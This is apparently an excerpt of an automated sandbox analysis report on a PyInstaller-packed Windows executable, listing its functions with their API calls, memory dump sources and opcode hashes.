                                                                                                                                                                                                      • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                      • Instruction ID: ccb0a3abd6f52daee80d05edc2e95a7ced09e41fb20fb9d32e20ce6d93c1a481
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9221D772608AC286D760AF18D4803B9B6A0FB84F54F944335E6BE876D5DF3CD4118B50
                                                                                                                                                                                                      Function 00007FF7FF59042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                      • Instruction ID: 500166a5650fe92580b8071ade264c7eb2e3d94f3392d6ef0fedb682d5cb0fdf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1401A521A08B8141EB28EF6259010A9E695BF86FE0F884B31DE7C57BD6CE3CE4114350
                                                                                                                                                                                                      Function 00007FF7FF589070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(?,00007FF7FF586466,?,00007FF7FF58336E), ref: 00007FF7FF589092
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2592636585-0
                                                                                                                                                                                                      • Opcode ID: 6c0d9462715ca9992f6b4afaad31bbb453c28a5b2bab261bfd845826f23efb25
                                                                                                                                                                                                      • Instruction ID: bebaf3bd2d1175ab02408188de200d3c04f01f21058f7f6fcd0080b1798c4333
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c0d9462715ca9992f6b4afaad31bbb453c28a5b2bab261bfd845826f23efb25
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD08611B2458541EB54B767754656591516B89BC4F88C035EE2D03796DC3CC0518740
                                                                                                                                                                                                      Function 00007FF7FF59EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF7FF59B39A,?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA), ref: 00007FF7FF59EC5D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                      • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                      • Instruction ID: bc63c55734354548e9b20758ae9cd3b2f3c568a5651042b0f17778a62dbb5afa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECF0F954B0A69792FF6C7A6298E12F5D2909F85B80FCC5630C97E873D1EE1DE49182B0
                                                                                                                                                                                                      Function 00007FF7FF59D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7FF590D00,?,?,?,00007FF7FF59236A,?,?,?,?,?,00007FF7FF593B59), ref: 00007FF7FF59D6AA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                      • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                      • Instruction ID: 2873f2212832c7c6d3179c13600a18cdd484f53727a6a91f3405df183929c501
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F03415E0D28645FF787A7198516F992904F95BA0F884330997E873D2EE2CA48082B0

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00007FF7FF588BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                      • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                      • Instruction ID: bb1e8f7c11fd39835bd5c9ebc188d4382c84938100bf41fe2b99b186b4af867f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D15D32A09AC296EB10AF74E8542E9B760FB84B58F800335DA7D47AE4DF3CD555C7A0
                                                                                                                                                                                                      Function 00007FFBBB63A96C Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                      • Opcode ID: 66b512622c9808b6d5bb10331fb7d468776e2acf9cac37bd1f86af3ecdb5c734
                                                                                                                                                                                                      • Instruction ID: 488721c52d54d7ee72d0ce80e8175655d7cf59b8ca2ca345961c6a46ed99898c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66b512622c9808b6d5bb10331fb7d468776e2acf9cac37bd1f86af3ecdb5c734
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB311BB7608B8186EB609F68E8903EDB361FB84744F44803ADB4E57BA4DF38D949C714
                                                                                                                                                                                                      Function 00007FFBBB6137D0 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                      • Opcode ID: ea9c6d9dc5ab45d36038557af9431a61bb458cf3d39685e5c3059e6e3831df78
                                                                                                                                                                                                      • Instruction ID: 08af2a71f199c7c3cf21974584f77c586001721da855c4976f4fe6424ad942a3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea9c6d9dc5ab45d36038557af9431a61bb458cf3d39685e5c3059e6e3831df78
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C3128B6608B8196EB648F64E8407A9B364FB84744F44943ADB4F47BA4DF38DA48C718
                                                                                                                                                                                                      Function 00007FF7FF5883B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58841B
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58849E
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884BD
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884CB
                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884DC
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                      • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction ID: 1f4735558c2cc05e2b2cae2f858f605ce02fb16e1e08164ffce82021d2475a73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6416222A0DAC295EB20BB24E4445F9A360FB94759FC00332D57D476E4DF3CD54AC7A4
                                                                                                                                                                                                      Function 00007FF7FF58D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                      • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                      • Instruction ID: c2acd07a565e386ac312abf6f36a38e48317dc5d6bc808492fb01e9d945daff6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19314372609BC196EB609F60E8403EE73A1FB84704F84413ADA6D47B98EF3CD558C750
                                                                                                                                                                                                      Function 00007FF7FF5A5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5CB5
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A979
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A99E
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5CA4
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                                                      • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                      • Instruction ID: 19577b267cfca23daac5ff011ebdbb43c71149401190becd7be0bf4097eda078
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD1C026A0928286EB24BF35D4409F9A791FF45B84FC48235EA3D476D6DF3CE46187A0
                                                                                                                                                                                                      Function 00007FF7FF59A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                      • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                      • Instruction ID: 33fa9eb35eca640c0c64bb445f1c715feab2f126a69611951d5a1ba6ec53cb56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0319632618BC196DB60DF64E8402EEB3A4FB88754F940236EAAD43BA9DF3CC155C750
                                                                                                                                                                                                      Function 00007FF7FF5A18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                      • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                      • Instruction ID: 02d96841ccad658c57baafa351ff0ad6bfcc1f1b2a693bf5a34f38f384d63759
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABB1E622B1A6C641EF60AB6194101F9E391EB45BE4F845332DE7E47BC5EE3CE451CBA0
                                                                                                                                                                                                      Function 00007FF7FF5A5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A564C
